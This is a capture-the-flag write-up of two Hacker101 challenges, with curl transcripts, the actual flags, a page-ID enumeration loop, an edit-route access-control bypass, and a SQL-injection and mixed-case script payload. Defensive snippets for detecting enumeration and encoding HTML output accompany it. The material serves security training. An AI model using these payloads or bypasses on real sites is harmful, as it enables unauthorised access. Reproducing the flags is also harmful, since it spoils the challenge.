Hacker101 CTF

Introduction

Hacker101 CTF appears to be a new CTF set up by HackerOne, the bug bounty platform. Flags take a form similar to ^FLAG^37ae568362f974017fa575f08cd215044cd6bb395c3f5e5e293ee5324ba6769c$FLAG$. A HackerOne account is required to log in. Additional instructions can be found at https://docs.hackerone.com/hackers/hacker101.html.

Challenge difficulty is ranked as trivial, easy, moderate, hard or expert. Points are allocated according to difficulty and range from 1 point for trivial to 9 points for expert. Each challenge may have multiple flags, and the completion indicator shows how many. The minimum number of flags per challenge was 1, with a maximum of 7 for the Postbook challenge.

WARNING: This post contains actual flags.

Trivial (1 / flag): A little something to get you started (Web)

  • Navigated to http://35.227.24.107/a5fa082820/
curl -v http://35.227.24.107/a5fa082820/
*   Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:11:47 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 194
< Connection: keep-alive
<

<!doctype html>
<html>
        <head>
                <style>
                        body {
                                background-image: url("background.png");
                        }
                </style>
        </head>
        <body>
                <p>Welcome to level 0.  Enjoy your stay.</p>
        </body>
</html>
* Connection #0 to host 35.227.24.107 left intact
  • Hint: Take a look at the source for the page
  • Attempted http://35.227.24.107/a5fa082820/background.png
curl -v http://35.227.24.107/a5fa082820/background.png
*   Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/background.png HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:16:02 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 76
< Connection: keep-alive
<
^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$* Connection #0 to host 35.227.24.107 left intact
  • Submitted: ^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$

Easy (2 / flag): Micro-CMS v1 (Web)

  • Navigated to http://35.227.24.107/06e5e5463a/
curl -v http://35.227.24.107/06e5e5463a/
*   Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /06e5e5463a/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:18:32 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 236
< Connection: keep-alive
<

<!doctype html>
<html>
        <head>
                <title>Micro-CMS</title>
        </head>
        <body>
                <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
                </ul>
                <a href="page/create">Create a new page</a>
        </body>
</html>
* Connection #0 to host 35.227.24.107 left intact
  • Manually navigated the site, explored the page preview and edit functions, and created a page; noticed that the newly created page was assigned page number 13
  • Iterated through all pages from 1 to 13 into a file for manual review using for /l %i in (1,1,13) do ( curl -v http://35.227.24.107/06e5e5463a/page/%i ) >> Micro-CMS_v1.txt
  • The majority of pages returned an error message indicating that the page was not found:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server.  If you entered the URL manually please check your spelling and try again.</p>
  • However, one page, page 6, returned a different message indicating that it may be protected:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>
  • Attempted to edit the page by opening the edit view of the test page I had created and then changing the page ID in the URL to six, i.e. http://35.227.24.107/06e5e5463a/page/edit/6 (the view route enforced the 403, but the edit route did not)
  • Found a flag:
My secret is ^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
  • Submitted: ^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
  • Realised that this challenge had multiple flags; could not find anything else, so went to the hints for the challenge and got:

Hints for "Micro-CMS v1"
Flag0 -- Found

    Try creating a new page
    How are pages indexed?
    Look at the sequence of IDs
    If the front door doesn't open, try the window
    In what ways can you retrieve page contents?

Flag1 -- Not Found
You don't have any hints for this flag yet.
Flag2 -- Not Found
You don't have any hints for this flag yet.
Flag3 -- Not Found
You don't have any hints for this flag yet. 
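The page/1 to page/13 loop above is exactly the pattern a defender can pick out of a web server's access log: one client walking page IDs in order and collecting mostly 404/403 responses. The following detector is an added example, not part of the original write-up or of Hacker101; the log lines are constructed in nginx "combined" format and the thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict

# Constructed nginx "combined" access-log lines (not real server logs) modelled
# on the page/1..13 loop in the write-up: one client walks IDs in order and
# mostly gets 404/403, while a second client just reads two existing pages.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Mar/2020:09:20:01 +0000] "GET /06e5e5463a/page/1 HTTP/1.1" 200 512 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:01 +0000] "GET /06e5e5463a/page/2 HTTP/1.1" 200 731 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:02 +0000] "GET /06e5e5463a/page/3 HTTP/1.1" 404 232 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:02 +0000] "GET /06e5e5463a/page/4 HTTP/1.1" 404 232 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:03 +0000] "GET /06e5e5463a/page/5 HTTP/1.1" 404 232 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:03 +0000] "GET /06e5e5463a/page/6 HTTP/1.1" 403 243 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:04 +0000] "GET /06e5e5463a/page/7 HTTP/1.1" 404 232 "-" "curl/7.55.1"
203.0.113.5 - - [20/Mar/2020:09:20:04 +0000] "GET /06e5e5463a/page/8 HTTP/1.1" 404 232 "-" "curl/7.55.1"
198.51.100.7 - - [20/Mar/2020:09:21:10 +0000] "GET /06e5e5463a/page/2 HTTP/1.1" 200 731 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Mar/2020:09:21:15 +0000] "GET /06e5e5463a/page/1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
PAGE_RE = re.compile(r"/page/(\d+)$")


def find_enumerators(log_text, min_ids=5, max_gap=1, min_error_ratio=0.5):
    """Return {ip: stats} for clients that walk page IDs in a near-consecutive
    run of at least `min_ids` and mostly receive 403/404 while doing so."""
    per_ip = defaultdict(list)  # ip -> [(page_id, status), ...]
    for line in log_text.splitlines():
        rec = LOG_RE.match(line)
        page = PAGE_RE.search(rec.group("path")) if rec else None
        if rec and page:
            per_ip[rec.group("ip")].append((int(page.group(1)), int(rec.group("status"))))

    flagged = {}
    for ip, hits in per_ip.items():
        ids = sorted({pid for pid, _ in hits})
        # Longest run of IDs where each step is at most `max_gap` apart.
        run = best = 1
        for a, b in zip(ids, ids[1:]):
            run = run + 1 if b - a <= max_gap else 1
            best = max(best, run)
        errors = sum(1 for _, status in hits if status in (403, 404))
        ratio = errors / len(hits)
        if best >= min_ids and ratio >= min_error_ratio:
            flagged[ip] = {"ids_probed": len(ids), "longest_run": best,
                           "error_ratio": round(ratio, 2)}
    return flagged
```

On the sample above only 203.0.113.5 is flagged (eight consecutive IDs, 75% errors); the browser client reading two existing pages is not.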
  • Clicked on the Get a hint button and got "Make sure you tamper with every input"
  • Attempted basic SQL injection: no result
  • Attempted JavaScript injection: <script> tags were replaced with <scrubbed> in the CMS page, and < and > were replaced by &lt; and &gt;, so some input sanitisation is occurring
  • Payload used: ' OR 1=1; --x <Script>alert("hello world");
  • It wasn't until the <-- Go Home link was clicked that the JavaScript injection actually triggered
  • We got a JavaScript pop-up with the flag
  • Submitted: ^FLAG^468c7fb39ff2b5b8d10eff89231d39521e430bef688904069211feedb5215d11$FLAG$
  • Since the JavaScript triggered on the home page, manually navigated to all other pages and edit pages to see if another script triggered
  • Discovered that on the Markdown Test page, the page cannot be saved because the URL of the adorable kitten image is broken
  • Tried injecting into the CMS page content and manually navigated to other pages
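Why the <Script> variant got past the filter while the earlier attempt was scrubbed: a tag blacklist matches exact strings, whereas output encoding at the point where text lands in HTML leaves nothing for the browser to parse as a tag. The snippet below is an added example, not the CMS's code; naive_scrub is my assumption of how the <scrubbed> replacement behaves, written only to reproduce what the write-up observed, and render_home_listing models the home-page <ul> from the curl output.

```python
import html
import re

# Payload quoted in the write-up; it slips through a case-sensitive blacklist
# because "<Script>" is not "<script>".
PAYLOAD = "' OR 1=1; --x <Script>alert(\"hello world\");"

SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def naive_scrub(text):
    """Assumed reconstruction of the CMS filter (not its real code): a
    case-sensitive replace of <script> tags with the <scrubbed> marker."""
    return text.replace("<script>", "<scrubbed>").replace("</script>", "<scrubbed>")


def encode_for_html_text(text):
    """Output encoding for an HTML text node: every < > & " ' becomes an
    entity, so no tag can form whatever its case, spacing or nesting."""
    return html.escape(text, quote=True)


def has_script_tag(rendered):
    """Would a browser see a <script> element in this rendered HTML?"""
    return SCRIPT_TAG_RE.search(rendered) is not None


def render_home_listing(titles, encoder):
    """Home-page <ul> of page links like the one in the curl output above,
    with each title passed through the chosen encoder before insertion."""
    items = "".join(
        f'<li><a href="page/{i}">{encoder(t)}</a></li>' for i, t in enumerate(titles, 1)
    )
    return f"<ul>{items}</ul>"
```

The blacklist stops the lowercase form only; the encoded form keeps the text readable after html.unescape while never producing a live tag.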